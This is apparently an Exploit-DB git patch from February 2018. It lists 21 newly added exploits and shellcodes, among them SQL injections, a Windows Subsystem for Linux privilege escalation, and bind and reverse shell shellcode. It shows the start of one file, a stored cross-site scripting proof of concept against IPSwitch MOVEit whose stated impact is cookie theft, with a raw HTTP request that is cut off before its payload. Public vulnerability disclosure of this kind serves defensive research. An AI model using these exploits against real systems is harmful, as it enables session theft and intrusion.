From d12dffd438c850ba2c45106a90ad30fd7f4d3b13 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 3 Feb 2018 05:01:48 +0000 Subject: [PATCH] DB: 2018-02-03 21 changes to exploits/shellcodes Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection Event Manager 1.0 - SQL Injection Fancy Clone Script - 'search_browse_product' SQL Injection Real Estate Custom Script - 'route' SQL Injection Advance Loan Management System - 'id' SQL Injection IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload Joomla! Component JMS Music 1.1.1 - SQL Injection Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal FiberHome AN5506 - Unauthenticated Remote DNS Change Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes) Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes) Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode --- exploits/aspx/webapps/43947.txt | 45 ++ exploits/hardware/webapps/43961.txt | 54 ++ exploits/multiple/webapps/43960.py | 197 +++++ exploits/php/webapps/43940.html | 32 + exploits/php/webapps/43941.txt | 49 ++ exploits/php/webapps/43942.txt | 37 + exploits/php/webapps/43943.txt | 45 ++ exploits/php/webapps/43948.html | 33 + exploits/php/webapps/43949.txt | 27 + exploits/php/webapps/43950.txt | 26 + exploits/php/webapps/43957.txt | 26 + exploits/php/webapps/43958.txt | 27 + exploits/php/webapps/43959.txt | 71 ++ exploits/windows/local/43962.c | 450 +++++++++++ exploits/windows/webapps/43883.txt | 2 +- files_exploits.csv | 14 + files_shellcodes.csv | 6 + shellcodes/generator/43955.py | 124 +++ shellcodes/linux_x86-64/43951.nasm | 112 +++ shellcodes/linux_x86-64/43952.nasm | 89 +++ shellcodes/linux_x86-64/43953.nasm | 23 + shellcodes/linux_x86-64/43954.nasm | 37 + shellcodes/linux_x86-64/43956.c | 1087 +++++++++++++++++++++++++++ 23 files changed, 2612 insertions(+), 1 deletion(-) create mode 100644 exploits/aspx/webapps/43947.txt create mode 100644 exploits/hardware/webapps/43961.txt create mode 100755 exploits/multiple/webapps/43960.py create mode 100644 exploits/php/webapps/43940.html create mode 100644 exploits/php/webapps/43941.txt create mode 100644 exploits/php/webapps/43942.txt create mode 100644 exploits/php/webapps/43943.txt create mode 100644 exploits/php/webapps/43948.html create mode 100644 exploits/php/webapps/43949.txt create mode 100644 exploits/php/webapps/43950.txt create mode 100644 exploits/php/webapps/43957.txt create mode 100644 exploits/php/webapps/43958.txt create mode 100644 exploits/php/webapps/43959.txt create mode 100644 exploits/windows/local/43962.c create mode 100755 shellcodes/generator/43955.py create mode 100644 shellcodes/linux_x86-64/43951.nasm create mode 100644 shellcodes/linux_x86-64/43952.nasm create mode 100644 shellcodes/linux_x86-64/43953.nasm create mode 100644 shellcodes/linux_x86-64/43954.nasm create mode 100644 shellcodes/linux_x86-64/43956.c diff --git a/exploits/aspx/webapps/43947.txt b/exploits/aspx/webapps/43947.txt new file mode 100644 index 000000000..24e0b5fe1 --- /dev/null +++ b/exploits/aspx/webapps/43947.txt @@ -0,0 +1,45 @@ +# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS) +# Date: 1-31-2017 +# Software Link: https://www.ipswitch.com/moveit +# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable) +# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early Warning Security) +# Contact: https://twitter.com/crowdshield +# Vendor Homepage: https://www.ipswitch.com +# Category: Webapps +# Attack Type: Remote +# Impact: Data/Cookie Theft + + +1. Description + +IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks. + + +2. Proof of Concept + +The vulnerability lies in the Send Message -> Body Text Area input field. + +POST /human.aspx?r=692492538 HTTP/1.1 +Host: host.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Referer: https://host.com/human.aspx?r=510324925 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 598 + +czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=%5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=